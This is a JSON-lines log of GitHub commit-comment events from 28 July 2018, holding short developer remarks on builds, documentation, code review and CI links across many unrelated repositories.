{"id":"8032626548","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29869695,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T17:34:26Z","updated_at":"2018-07-28T17:34:26Z","author_association":"MEMBER","body":"Just use Authy which has a backup feature.\n\nOn Sat, Jul 28, 2018, 20:32 Alex Lam S.L. <notifications@github.com> wrote:\n\n> Right got it - this is certainly not straight forward for someone who\n> doesn't have Google attached to his daily life.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gruntjs/grunt-contrib-uglify/commit/f6f834bb6edcd1340a01053c91042b0bdcde4b97#commitcomment-29869686>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAVVtX_kEmcI_jkSpnmzCU98a7tyAij8ks5uLKAigaJpZM4Vk775>\n> .\n>\n"}},"created_at":"2018-07-28T17:34:26Z"}
{"id":"8032626593","type":"CommitCommentEvent","actor":{"login":"trexbatman"},"repo":{"name":"giselyalves13/angelHack2018"},"payload":{"comment":{"id":29869696,"position":null,"line":null,"path":null,"commit_id":"8b11de954a8a5ce543d1b14e21b20759d1a8b61c","created_at":"2018-07-28T17:34:27Z","updated_at":"2018-07-28T17:34:27Z","author_association":"COLLABORATOR","body":"Tipologias do Território\r\n[ftp://geoftp.ibge.gov.br/organizacao_do_territorio/tipologias_do_territorio/](url)"}},"created_at":"2018-07-28T17:34:27Z"}
{"id":"8032626714","type":"CommitCommentEvent","actor":{"login":"james-hubbs"},"repo":{"name":"james-hubbs/Scrapers"},"payload":{"comment":{"id":29869697,"position":10,"line":9,"path":"twitter/tweet_scraper.py","commit_id":"2b18456cb5d8830b7cdcb009223a023c937200b2","created_at":"2018-07-28T17:34:32Z","updated_at":"2018-07-28T17:34:32Z","author_association":"OWNER","body":"All keys have been regenerated."}},"created_at":"2018-07-28T17:34:32Z"}
{"id":"8032626831","type":"CommitCommentEvent","actor":{"login":"MHDGhanemBalhawan"},"repo":{"name":"MHDGhanemBalhawan/first-garage-node-express"},"payload":{"comment":{"id":29869698,"position":76,"line":38,"path":"server.js","commit_id":"092f73cbfbccecfdcc560dff7b0342ed6ec8cc24","created_at":"2018-07-28T17:34:36Z","updated_at":"2018-07-28T17:34:36Z","author_association":"OWNER","body":"I have a problem with linking the json file to the page.\r\n"}},"created_at":"2018-07-28T17:34:36Z"}
{"id":"8032627963","type":"CommitCommentEvent","actor":{"login":"Ostap34JS"},"repo":{"name":"tightenco/jigsaw"},"payload":{"comment":{"id":29869702,"position":null,"line":null,"path":null,"commit_id":"124d97dd5ab95743279d83d5db8f76d15aedcdc7","created_at":"2018-07-28T17:35:24Z","updated_at":"2018-07-28T17:35:24Z","author_association":"NONE","body":":tada: :tada: :tada:"}},"created_at":"2018-07-28T17:35:24Z"}
{"id":"8032629009","type":"CommitCommentEvent","actor":{"login":"BenCat07"},"repo":{"name":"nullworks/cathook"},"payload":{"comment":{"id":29869704,"position":null,"line":null,"path":null,"commit_id":"a4232688fa334739a0e1d98b33ae86fb2e7a5092","created_at":"2018-07-28T17:36:01Z","updated_at":"2018-07-28T17:36:01Z","author_association":"COLLABORATOR","body":"rip null"}},"created_at":"2018-07-28T17:36:01Z"}
{"id":"8032629340","type":"CommitCommentEvent","actor":{"login":"csomor"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29869706,"position":null,"line":null,"path":null,"commit_id":"342e4454238b32617fcd1fa49a1117d80a19237a","created_at":"2018-07-28T17:36:11Z","updated_at":"2018-07-28T17:36:11Z","author_association":"CONTRIBUTOR","body":"Sorry, I'll check, had to commit this from a different sandbox, I'll check how to arrive at the same error"}},"created_at":"2018-07-28T17:36:11Z"}
{"id":"8032629390","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29869707,"position":null,"line":null,"path":null,"commit_id":"ab319a4472fc751f31f2eb6f111305d33304a8d8","created_at":"2018-07-28T17:36:13Z","updated_at":"2018-07-28T17:36:13Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-82](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-82).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-82-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-28T17:36:13Z"}
{"id":"8032630858","type":"CommitCommentEvent","actor":{"login":"vadz"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29869719,"position":null,"line":null,"path":null,"commit_id":"342e4454238b32617fcd1fa49a1117d80a19237a","created_at":"2018-07-28T17:37:08Z","updated_at":"2018-07-28T17:37:08Z","author_association":"CONTRIBUTOR","body":"As a wild guess, it might happen when PCH are (or are not?) used."}},"created_at":"2018-07-28T17:37:08Z"}
{"id":"8032631064","type":"CommitCommentEvent","actor":{"login":"ohne80"},"repo":{"name":"0sander/stratux_air_nav_pro"},"payload":{"comment":{"id":29869720,"position":null,"line":null,"path":null,"commit_id":"f6d94e06da489a3e6a444d3ecc49e637e775bc0b","created_at":"2018-07-28T17:37:17Z","updated_at":"2018-07-28T17:37:17Z","author_association":"NONE","body":"that means with port 4000 it will work with xample air navigation pro?"}},"created_at":"2018-07-28T17:37:17Z"}
{"id":"8032631734","type":"CommitCommentEvent","actor":{"login":"AndreMiras"},"repo":{"name":"kivy/python-for-android"},"payload":{"comment":{"id":29869721,"position":27,"line":34,"path":"recipes/hostpython2/__init__.py","commit_id":"e72d87dc21511e2e15776027e4180662bd5768ef","created_at":"2018-07-28T17:37:41Z","updated_at":"2018-07-28T17:37:41Z","author_association":"CONTRIBUTOR","body":"Any reason for not compiling with `ucs4`, I thought this is what most host python distribution had:\r\n```python\r\nshprint(configure, '--enable-unicode=ucs4')\r\n```\r\nNot having it matching, could lead to some errors like:\r\n```\r\nSymbol not found: _PyUnicodeUCS2_AsASCIIString\r\nSymbol not found: _PyUnicodeUCS4_AsASCIIString\r\n```\r\nSee https://cffi.readthedocs.io/en/latest/installation.html#linux-and-os-x-ucs2-versus-ucs4\r\nOr maybe we could make it configurable."}},"created_at":"2018-07-28T17:37:41Z"}
{"id":"8032632063","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":29869722,"position":17,"line":80,"path":"src/Core/ImportReference.cs","commit_id":"923be5fab5ef03275d9ff963286bf7084435f02a","created_at":"2018-07-28T17:37:54Z","updated_at":"2018-07-28T17:37:54Z","author_association":"COLLABORATOR","body":"Two same checks `if (this.ModuleName == null) {  if (that.ModuleName != null) { .. } }`. Is it mistake?"}},"created_at":"2018-07-28T17:37:54Z"}
{"id":"8032632238","type":"CommitCommentEvent","actor":{"login":"skybrian"},"repo":{"name":"jimmyff/dart-gif-encoder"},"payload":{"comment":{"id":29869723,"position":12,"line":10,"path":"pubspec.yaml","commit_id":"b0c14cc43a5a96c5939f6b0f0bf2c571c327de9b","created_at":"2018-07-28T17:38:01Z","updated_at":"2018-07-28T17:38:01Z","author_association":"NONE","body":"It looks like Dart 2 is still in preview (behind a flag). Maybe it's too soon to drop support for Dart 1?\r\n"}},"created_at":"2018-07-28T17:38:01Z"}
{"id":"8032633168","type":"CommitCommentEvent","actor":{"login":"ohne80"},"repo":{"name":"0sander/stratux_air_nav_pro"},"payload":{"comment":{"id":29869725,"position":null,"line":null,"path":null,"commit_id":"f6d94e06da489a3e6a444d3ecc49e637e775bc0b","created_at":"2018-07-28T17:38:37Z","updated_at":"2018-07-28T17:38:37Z","author_association":"NONE","body":"i didnt find on my raspberry the log file stratux.config to config the port?!"}},"created_at":"2018-07-28T17:38:37Z"}
{"id":"8032635451","type":"CommitCommentEvent","actor":{"login":"skybrian"},"repo":{"name":"jimmyff/dart-gif-encoder"},"payload":{"comment":{"id":29869727,"position":173,"line":135,"path":"test/gif_test.dart","commit_id":"b0c14cc43a5a96c5939f6b0f0bf2c571c327de9b","created_at":"2018-07-28T17:40:01Z","updated_at":"2018-07-28T17:40:01Z","author_association":"NONE","body":"To prevent the formatter from doing this, I vaguely recall that the trick is to put a comment at the end of each line? Not sure if that still works.\r\n"}},"created_at":"2018-07-28T17:40:01Z"}
{"id":"8032636639","type":"CommitCommentEvent","actor":{"login":"premaca"},"repo":{"name":"ValidusOs/frameworks_base"},"payload":{"comment":{"id":29869728,"position":null,"line":null,"path":null,"commit_id":"293c3ad400b10d2de2c87bd3ad02b9328283e20d","created_at":"2018-07-28T17:40:41Z","updated_at":"2018-07-28T17:40:41Z","author_association":"NONE","body":"Our frameworks sort this overlay? @martinusbe 🤔"}},"created_at":"2018-07-28T17:40:41Z"}
{"id":"8032637023","type":"CommitCommentEvent","actor":{"login":"premaca"},"repo":{"name":"ValidusOs/frameworks_base"},"payload":{"comment":{"id":29869729,"position":null,"line":null,"path":null,"commit_id":"293c3ad400b10d2de2c87bd3ad02b9328283e20d","created_at":"2018-07-28T17:40:57Z","updated_at":"2018-07-28T17:40:57Z","author_association":"NONE","body":"*support"}},"created_at":"2018-07-28T17:40:57Z"}
{"id":"8032637550","type":"CommitCommentEvent","actor":{"login":"lwm"},"repo":{"name":"metacloud/molecule"},"payload":{"comment":{"id":29869730,"position":null,"line":null,"path":null,"commit_id":"6197f1d3819d10c05cff03b8d60c0d84402d4218","created_at":"2018-07-28T17:41:24Z","updated_at":"2018-07-28T17:41:24Z","author_association":"NONE","body":":rocket: "}},"created_at":"2018-07-28T17:41:24Z"}
{"id":"8032638078","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29869732,"position":null,"line":null,"path":null,"commit_id":"41ad639304423a8f6e045836a62cd979d95b88ba","created_at":"2018-07-28T17:41:44Z","updated_at":"2018-07-28T17:41:44Z","author_association":"MEMBER","body":"I should be more specific; these APIs are not just deprecated, but literally removed from the recent OpenSMTPD versions."}},"created_at":"2018-07-28T17:41:44Z"}
{"id":"8032643909","type":"CommitCommentEvent","actor":{"login":"csomor"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29869749,"position":null,"line":null,"path":null,"commit_id":"342e4454238b32617fcd1fa49a1117d80a19237a","created_at":"2018-07-28T17:45:48Z","updated_at":"2018-07-28T17:45:48Z","author_association":"CONTRIBUTOR","body":"I guessed so as well, we'll see, rebuilds take some time"}},"created_at":"2018-07-28T17:45:48Z"}
{"id":"8032644092","type":"CommitCommentEvent","actor":{"login":"maciejkula"},"repo":{"name":"kaushalmodi/ox-hugo"},"payload":{"comment":{"id":29869751,"position":null,"line":null,"path":null,"commit_id":"081a4a977a191113127ac56bc0cf33bbc4f41deb","created_at":"2018-07-28T17:45:53Z","updated_at":"2018-07-28T17:45:53Z","author_association":"NONE","body":"@kaushalmodi thanks for making `ox-hugo`, it's a pleasure to use!"}},"created_at":"2018-07-28T17:45:53Z"}
{"id":"8032645596","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29869755,"position":null,"line":null,"path":null,"commit_id":"b235a1325c988e8694f2567cc8b649c6e14f8ca1","created_at":"2018-07-28T17:46:33Z","updated_at":"2018-07-28T17:46:33Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-28T17:46:33Z"}
{"id":"8032645603","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29869756,"position":null,"line":null,"path":null,"commit_id":"1d74ab92efa249776d78c5d8668dc49e756db208","created_at":"2018-07-28T17:46:34Z","updated_at":"2018-07-28T17:46:34Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-28T17:46:34Z"}
{"id":"8032648750","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"steinbaugh/basejump"},"payload":{"comment":{"id":29869764,"position":null,"line":null,"path":null,"commit_id":"9862fee66f8aaea75d2d8cc13dc88fdac0a25f76","created_at":"2018-07-28T17:48:05Z","updated_at":"2018-07-28T17:48:05Z","author_association":"NONE","body":"[R/sampleData-methods.R:43:1:](https://github.com/steinbaugh/basejump/blob/9862fee66f8aaea75d2d8cc13dc88fdac0a25f76/R/sampleData-methods.R#L43) *style:* **Lines should not be more than 80 characters.**\n```r\n​        # Legacy arguments =========================================================\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-28T17:48:05Z"}
{"id":"8032650598","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"steinbaugh/basejump"},"payload":{"comment":{"id":29869769,"position":null,"line":null,"path":null,"commit_id":"9862fee66f8aaea75d2d8cc13dc88fdac0a25f76","created_at":"2018-07-28T17:49:05Z","updated_at":"2018-07-28T17:49:05Z","author_association":"NONE","body":"[R/sampleData-methods.R:43:1:](https://github.com/steinbaugh/basejump/blob/9862fee66f8aaea75d2d8cc13dc88fdac0a25f76/R/sampleData-methods.R#L43) *style:* **Lines should not be more than 80 characters.**\n```r\n​        # Legacy arguments =========================================================\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-28T17:49:05Z"}
{"id":"8032651569","type":"CommitCommentEvent","actor":{"login":"iamdv"},"repo":{"name":"iamdv/QlikView-Security-Masterclass"},"payload":{"comment":{"id":29869771,"position":null,"line":null,"path":null,"commit_id":"334a3f94315255459eb4bba53b9d2449e41aa2fe","created_at":"2018-07-28T17:49:35Z","updated_at":"2018-07-28T17:49:35Z","author_association":"OWNER","body":"change the name"}},"created_at":"2018-07-28T17:49:35Z"}
{"id":"8032652395","type":"CommitCommentEvent","actor":{"login":"alexlamsl"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29869772,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T17:49:57Z","updated_at":"2018-07-28T17:49:57Z","author_association":"CONTRIBUTOR","body":"Let's get back to the business of updating documentation. I have added to `CHANGELOG` but `npm test` certainly doesn't update `README.md` - and running `grunt` gives:\r\n```\r\nWarning: Task \"build-contrib\" not found. Use --force to continue.\r\n\r\nAborted due to warnings.\r\n```"}},"created_at":"2018-07-28T17:49:57Z"}
{"id":"8032653664","type":"CommitCommentEvent","actor":{"login":"kailan"},"repo":{"name":"bih/spotify-ruby"},"payload":{"comment":{"id":29869775,"position":null,"line":null,"path":null,"commit_id":"7983c9ed74a1cb9420d3a420f619d892efddc68a","created_at":"2018-07-28T17:50:35Z","updated_at":"2018-07-28T17:50:35Z","author_association":"CONTRIBUTOR","body":"Much better! :+1:"}},"created_at":"2018-07-28T17:50:35Z"}
{"id":"8032656143","type":"CommitCommentEvent","actor":{"login":"Fuco1"},"repo":{"name":"Silex/docker.el"},"payload":{"comment":{"id":29869790,"position":8,"line":38,"path":"docker.el","commit_id":"96404e896627f737a219f096aa080aa4d8538639","created_at":"2018-07-28T17:52:23Z","updated_at":"2018-07-28T17:52:23Z","author_association":"NONE","body":"@Silex you seem to be having circular requires there, for example `docker-container` requires `docker` and `docker` requires it back.\r\n\r\nThat shouldn't even load at all (it should throw an error about circular require) so maybe `use-package` catches that and then fall back to some other method (like looking up the elpa tree for the package)."}},"created_at":"2018-07-28T17:52:23Z"}
{"id":"8032656187","type":"CommitCommentEvent","actor":{"login":"Fermec28"},"repo":{"name":"makeitrealcamp/algorithms-make-it-real"},"payload":{"comment":{"id":29869791,"position":10,"line":10,"path":"02_difference_of_squares/solutions/sebastian_zapata/difference_of_squares.rb","commit_id":"0cd3738c7a33d4929b00e7722d1a6155b6123348","created_at":"2018-07-28T17:52:25Z","updated_at":"2018-07-28T17:52:25Z","author_association":"NONE","body":"Porque  asi @_square_of_sum || \r\n"}},"created_at":"2018-07-28T17:52:25Z"}
{"id":"8032656681","type":"CommitCommentEvent","actor":{"login":"alexlamsl"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29869792,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T17:52:46Z","updated_at":"2018-07-28T17:52:46Z","author_association":"CONTRIBUTOR","body":"Ah, never mind - I've figured that part out."}},"created_at":"2018-07-28T17:52:46Z"}
{"id":"8032657328","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29869794,"position":null,"line":null,"path":null,"commit_id":"a64ff3b1a21faee7d5e96f2257caaffc7fb4c9ae","created_at":"2018-07-28T17:53:15Z","updated_at":"2018-07-28T17:53:15Z","author_association":"MEMBER","body":"This blame history is going nuts, so by default we just blame silverwind for everything now :)"}},"created_at":"2018-07-28T17:53:15Z"}
{"id":"8032657498","type":"CommitCommentEvent","actor":{"login":"skybrian"},"repo":{"name":"jimmyff/dart-gif-encoder"},"payload":{"comment":{"id":29869795,"position":12,"line":10,"path":"pubspec.yaml","commit_id":"b0c14cc43a5a96c5939f6b0f0bf2c571c327de9b","created_at":"2018-07-28T17:53:22Z","updated_at":"2018-07-28T17:53:22Z","author_association":"NONE","body":"On second thought, do Dart 1 users automatically get the previous version? Maybe that's fine.\r\n\r\n\r\n"}},"created_at":"2018-07-28T17:53:22Z"}
{"id":"8032658344","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29869797,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T17:53:58Z","updated_at":"2018-07-28T17:53:58Z","author_association":"MEMBER","body":"You shouldn'thave removed the contrib plugin. I will wake care of this, did\nnot tag it\n\nOn Sat, Jul 28, 2018, 20:52 Alex Lam S.L. <notifications@github.com> wrote:\n\n> Ah, never mind - I've figured that part out.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gruntjs/grunt-contrib-uglify/commit/f6f834bb6edcd1340a01053c91042b0bdcde4b97#commitcomment-29869792>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAVVtSPibdxjPTqxVc07_Jq7kk2WNLSMks5uLKTwgaJpZM4Vk775>\n> .\n>\n"}},"created_at":"2018-07-28T17:53:58Z"}
{"id":"8032665426","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29869820,"position":null,"line":null,"path":null,"commit_id":"2add5a654a12378118a7869670e123daa9cf8f76","created_at":"2018-07-28T17:59:13Z","updated_at":"2018-07-28T17:59:13Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-84](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-84).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-84-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-28T17:59:13Z"}
{"id":"8032666234","type":"CommitCommentEvent","actor":{"login":"CobaltWolf"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29869821,"position":null,"line":null,"path":null,"commit_id":"07b3b10b1f9dd77ea50e087e874022ac81aa3cfd","created_at":"2018-07-28T17:59:40Z","updated_at":"2018-07-28T17:59:40Z","author_association":"OWNER","body":"If the Centaur-D tank gets redone there would be a provision for D-1/T tankage as well. We'd have to do research to make sure we get the most flexible parts possible for all the small variations. "}},"created_at":"2018-07-28T17:59:40Z"}
{"id":"8032667905","type":"CommitCommentEvent","actor":{"login":"naymt1120"},"repo":{"name":"naymt1120/Data_Analysts_Project1"},"payload":{"comment":{"id":29869833,"position":null,"line":null,"path":null,"commit_id":"b4abff4afcbd70090053603a191facc13c4ed665","created_at":"2018-07-28T18:00:46Z","updated_at":"2018-07-28T18:00:46Z","author_association":"OWNER","body":"Yes."}},"created_at":"2018-07-28T18:00:46Z"}
{"id":"8032670114","type":"CommitCommentEvent","actor":{"login":"yaneurao"},"repo":{"name":"yaneurao/YaneuraOu"},"payload":{"comment":{"id":29869845,"position":null,"line":null,"path":null,"commit_id":"2458e32e518438db19cea57239e77b1864aeed14","created_at":"2018-07-28T18:02:23Z","updated_at":"2018-07-28T18:02:23Z","author_association":"OWNER","body":"そうですね…。いずれそうしようと思います。(そこまで手が回ってないです..)\r\n本当はUSIプロトコルでid nameとid author、無くして、\"option name author type string value ...\"のようにoptionとして扱ってあれば良かったように思うんですけども。(そうすると画一的に扱える)"}},"created_at":"2018-07-28T18:02:23Z"}
{"id":"8032678514","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29869870,"position":21,"line":25,"path":"package.json","commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T18:08:41Z","updated_at":"2018-07-28T18:08:41Z","author_association":"MEMBER","body":"@alexlamsl: this needs to be reverted also."}},"created_at":"2018-07-28T18:08:41Z"}
{"id":"8032679348","type":"CommitCommentEvent","actor":{"login":"ShmooDude"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29869874,"position":null,"line":null,"path":null,"commit_id":"5fee20655acba9328b9aba665075d191db7afe1d","created_at":"2018-07-28T18:09:18Z","updated_at":"2018-07-28T18:09:18Z","author_association":"NONE","body":"I'm actually rewriting the Equipment module.  So much of it is unnecessary and also done in a bad way based on how scripts reference it (everything is stored by `slotId` when it should be stored by `itemId`).  I'm mostly done.\r\n\r\nDo you see any reason to keep ilvls stored?  Technically `HasEquippedItem` (in a script, not in Equipment.lua) can take a minimum ilvl requirement but I can't think of any reason it'd ever be needed.  Was thinking of just removing it as it would greatly simplify things but not requiring items to be loaded and would avoid needing to hook the `GET_ITEM_INFO_RECEIVED` event."}},"created_at":"2018-07-28T18:09:18Z"}
{"id":"8032680672","type":"CommitCommentEvent","actor":{"login":"lalonarvaez"},"repo":{"name":"lalonarvaez/fundamentosdeHTML_Eduardo_Narvaez"},"payload":{"comment":{"id":29869886,"position":10,"line":10,"path":"educacion.html","commit_id":"f42d35a7edc0833cf700ccd5cc6eb03cec461dcb","created_at":"2018-07-28T18:10:11Z","updated_at":"2018-07-28T18:10:11Z","author_association":"OWNER","body":"se cambiaron etiquetas de imagen \r\nsvg"}},"created_at":"2018-07-28T18:10:11Z"}
{"id":"8032681418","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29869887,"position":null,"line":null,"path":null,"commit_id":"fa56f5bdc3001171dcec2ab7896015d345e82465","created_at":"2018-07-28T18:10:39Z","updated_at":"2018-07-28T18:10:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create Project structure for the Front Controller Design](https://trello.com/c/wu6KuoSA/16-create-project-structure-for-the-front-controller-design)"}},"created_at":"2018-07-28T18:10:39Z"}
{"id":"8032682430","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29869889,"position":null,"line":null,"path":null,"commit_id":"47764988e400da705cada4ad538fd177e10e2c55","created_at":"2018-07-28T18:11:19Z","updated_at":"2018-07-28T18:11:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement Address Model](https://trello.com/c/fnQMxEEW/15-implement-address-model)"}},"created_at":"2018-07-28T18:11:19Z"}
{"id":"8032683503","type":"CommitCommentEvent","actor":{"login":"divyadavid"},"repo":{"name":"divyadavid/july28"},"payload":{"comment":{"id":29869891,"position":null,"line":null,"path":null,"commit_id":"a4e679133d7c2a3910de0b9b4c2b9e7abb8f1990","created_at":"2018-07-28T18:12:02Z","updated_at":"2018-07-28T18:12:02Z","author_association":"OWNER","body":"java file 2 is modified"}},"created_at":"2018-07-28T18:12:02Z"}
{"id":"8032683532","type":"CommitCommentEvent","actor":{"login":"Quinn-Donnelly"},"repo":{"name":"Quinn-Donnelly/projectOne"},"payload":{"comment":{"id":29869892,"position":null,"line":null,"path":null,"commit_id":"fa56f5bdc3001171dcec2ab7896015d345e82465","created_at":"2018-07-28T18:12:03Z","updated_at":"2018-07-28T18:12:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement Employee DOA](https://trello.com/c/1cR5ja19/13-implement-employee-doa)"}},"created_at":"2018-07-28T18:12:03Z"}
{"id":"8032684081","type":"CommitCommentEvent","actor":{"login":"trexbatman"},"repo":{"name":"giselyalves13/angelHack2018"},"payload":{"comment":{"id":29869895,"position":null,"line":null,"path":null,"commit_id":"8b11de954a8a5ce543d1b14e21b20759d1a8b61c","created_at":"2018-07-28T18:12:24Z","updated_at":"2018-07-28T18:12:24Z","author_association":"COLLABORATOR","body":"Perímetro urbano [http://www.sieg.go.gov.br/rgg/kmz/PerimetroUrbano.kmz](url)"}},"created_at":"2018-07-28T18:12:24Z"}
{"id":"8032686531","type":"CommitCommentEvent","actor":{"login":"richturn4u2"},"repo":{"name":"richturn4u2/hello-world"},"payload":{"comment":{"id":29869900,"position":null,"line":null,"path":null,"commit_id":"f0a38450694f2262c9b811993a70f8f739e1da7f","created_at":"2018-07-28T18:14:01Z","updated_at":"2018-07-28T18:14:01Z","author_association":"OWNER","body":"I am innovative\r\n"}},"created_at":"2018-07-28T18:14:01Z"}
{"id":"8032687129","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29869902,"position":null,"line":null,"path":null,"commit_id":"817961d4e9de2681fa903b6167fc9d9336e096e3","created_at":"2018-07-28T18:14:22Z","updated_at":"2018-07-28T18:14:22Z","author_association":"MEMBER","body":"Signal connections here are old-style, will not work with PyQt5."}},"created_at":"2018-07-28T18:14:22Z"}
{"id":"8032688701","type":"CommitCommentEvent","actor":{"login":"Dzhoker1"},"repo":{"name":"DmitriChe/python-alorithms-hw"},"payload":{"comment":{"id":29869917,"position":1,"line":1,"path":"hw5/task5_1.py","commit_id":"29afeb91c91e2a48948cebbf9db573785edd80f3","created_at":"2018-07-28T18:15:24Z","updated_at":"2018-07-28T18:15:24Z","author_association":"NONE","body":"Отличное решение.\r\nДа, согласен, что collection тут приходится притягивать за уши. Но у вас получилось. А практика лишней не бывает.\r\nРазве что вы сразу просите прибыль, а не за 4 отдельных квартала. Но ошибкой это считать не буду."}},"created_at":"2018-07-28T18:15:24Z"}
{"id":"8032688857","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29869918,"position":4,"line":10,"path":"src/hdskins/java/com/voxelmodpack/hdskins/upload/awt/ThreadOpenFile.java","commit_id":"b7af3a2c8d9d2442c110dcd16192c87917959421","created_at":"2018-07-28T18:15:30Z","updated_at":"2018-07-28T18:15:30Z","author_association":"MEMBER","body":"You probably meant `StringUtils` or guava `Strings`"}},"created_at":"2018-07-28T18:15:30Z"}
{"id":"8032690749","type":"CommitCommentEvent","actor":{"login":"grandquista"},"repo":{"name":"RebirthDB/rebirthdb-python"},"payload":{"comment":{"id":29869920,"position":5,"line":116,"path":"rebirthdb/_dump.py","commit_id":"20cb1c1d14be55669810564f4f6264daba395552","created_at":"2018-07-28T18:16:45Z","updated_at":"2018-07-28T18:16:45Z","author_association":"CONTRIBUTOR","body":"Definitely my bad. I should have checked implicit grouping on the old PR instead of going from memory."}},"created_at":"2018-07-28T18:16:45Z"}
{"id":"8032690805","type":"CommitCommentEvent","actor":{"login":"murilo9"},"repo":{"name":"murilo9/default"},"payload":{"comment":{"id":29869921,"position":null,"line":null,"path":null,"commit_id":"ab5897a21d009fec2ae4a197bcd220add3e1f7c5","created_at":"2018-07-28T18:16:48Z","updated_at":"2018-07-28T18:16:48Z","author_association":"OWNER","body":"idk"}},"created_at":"2018-07-28T18:16:48Z"}
{"id":"8032691223","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29869922,"position":4,"line":10,"path":"src/hdskins/java/com/voxelmodpack/hdskins/upload/awt/ThreadOpenFile.java","commit_id":"b7af3a2c8d9d2442c110dcd16192c87917959421","created_at":"2018-07-28T18:17:08Z","updated_at":"2018-07-28T18:17:08Z","author_association":"MEMBER","body":"Nope. That is the right one, unless either of those provide an equivalent to isBlank (null, empty string or pure whitespace)"}},"created_at":"2018-07-28T18:17:08Z"}
{"id":"8032694188","type":"CommitCommentEvent","actor":{"login":"pdeyo70"},"repo":{"name":"LambdaSchool/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29869926,"position":null,"line":null,"path":null,"commit_id":"a7a49eaba3e33468bb1c3628c55da7624e48b570","created_at":"2018-07-28T18:19:09Z","updated_at":"2018-07-28T18:19:09Z","author_association":"NONE","body":"This second commit also corrects issues with links in the footer."}},"created_at":"2018-07-28T18:19:09Z"}
